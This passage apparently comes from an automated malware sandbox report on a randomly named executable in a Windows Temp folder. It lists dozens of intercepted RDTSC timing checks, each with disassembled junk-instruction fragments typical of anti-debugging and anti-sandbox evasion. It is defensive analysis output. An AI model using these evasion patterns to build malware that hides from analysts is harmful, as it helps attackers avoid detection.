                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A423C second address: 5A426C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F29F0CD52A3h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A426C second address: 5A4274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A4274 second address: 5A4297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A4h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jns 00007F29F0CD5296h 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A2290 second address: 5A229B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F29F0C52756h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A229B second address: 5A22A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22A1 second address: 5A22DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0C52764h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F29F0C52766h 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F29F0C52756h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22DD second address: 5A22E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22E1 second address: 5A22E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22E5 second address: 5A22F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29F0CD5296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22F5 second address: 5A22FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22FB second address: 5A22FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A28CD second address: 5A28D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A2DF2 second address: 5A2E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F29F0CD52A0h 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A2E09 second address: 5A2E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52764h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A3749 second address: 5A374D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A374D second address: 5A3753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A3A33 second address: 5A3A39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A8126 second address: 5A8149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F29F0C52767h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A8149 second address: 5A8155 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29F0CD5296h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A7441 second address: 5A7456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F29F0C52756h 0x0000000a jmp 00007F29F0C5275Bh 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A7456 second address: 5A745A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A785B second address: 5A7879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A79D8 second address: 5A79DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A79DC second address: 5A79E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A79E4 second address: 5A7A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F29F0CD52A8h 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A7CDA second address: 5A7CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A7CF8 second address: 5A7D16 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007F29F0CD5296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F29F0CD529Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 jg 00007F29F0CD529Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5ACAB3 second address: 5ACAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5ACAB9 second address: 5ACABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B2DA2 second address: 5B2DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29F0C52756h 0x0000000a jnl 00007F29F0C52756h 0x00000010 popad 0x00000011 jg 00007F29F0C5275Ch 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B2DBF second address: 5B2DDE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F29F0CD52A4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B309C second address: 5B30A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B30A2 second address: 5B30A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B30A6 second address: 5B30AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B30AD second address: 5B30B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B30B5 second address: 5B30F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F29F0C52772h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29F0C52761h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B30F4 second address: 5B30FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B30FC second address: 5B3101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B3280 second address: 5B32B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A9h 0x00000009 jmp 00007F29F0CD52A1h 0x0000000e popad 0x0000000f pushad 0x00000010 jnl 00007F29F0CD5296h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B33ED second address: 5B33F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B3829 second address: 5B382D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B382D second address: 5B383B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnl 00007F29F0C52756h 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B468C second address: 5B4690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B4690 second address: 5B46B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F29F0C52769h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B46B5 second address: 5B46DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29F0CD529Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29F0CD52A5h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B2545 second address: 5B254F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F29F0C52756h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B254F second address: 5B2553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B2553 second address: 5B255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5B88A1 second address: 5B88AB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5BD14A second address: 5BD14E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5BD14E second address: 5BD178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F29F0CD52AFh 0x0000000c jmp 00007F29F0CD52A3h 0x00000011 jno 00007F29F0CD5296h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5BD178 second address: 5BD17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5BD2DB second address: 5BD2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5BD2E1 second address: 5BD2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5BD2E5 second address: 5BD319 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F29F0CD529Ch 0x00000013 push edx 0x00000014 jmp 00007F29F0CD52A9h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5BD319 second address: 5BD31F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5BD31F second address: 5BD329 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5BD329 second address: 5BD32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5CB9EE second address: 5CB9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5CB9F2 second address: 5CB9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5CB568 second address: 5CB581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29F0CD52A4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D0A79 second address: 5D0A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D0A84 second address: 5D0A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D0A88 second address: 5D0A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D0633 second address: 5D0660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F29F0CD5298h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F29F0CD5298h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D07AF second address: 5D07B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D537F second address: 5D5393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D852E second address: 5D8562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C52764h 0x00000009 jmp 00007F29F0C52767h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D8562 second address: 5D8566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D9B15 second address: 5D9B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52761h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F29F0C5275Dh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5D9B3C second address: 5D9B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 4F7683 second address: 4F769C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD5296h 0x00000008 js 00007F29F0CD5296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jnp 00007F29F0CD5296h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 50ABF8 second address: 50AC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0CD52A4h 0x0000000a jmp 00007F29F0CD52A5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F29F0CD5296h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 50AC2E second address: 50AC5B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29F0C52756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F29F0C52760h 0x00000011 push edi 0x00000012 jmp 00007F29F0C5275Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E07FF second address: 5E0805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E3577 second address: 5E357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E357F second address: 5E3585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 4F764D second address: 4F7672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F29F0C52764h 0x0000000e jo 00007F29F0C52756h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E3382 second address: 5E33AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push esi 0x00000008 jmp 00007F29F0CD52A4h 0x0000000d jng 00007F29F0CD5296h 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E33AB second address: 5E33C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C52761h 0x00000009 rdtsc
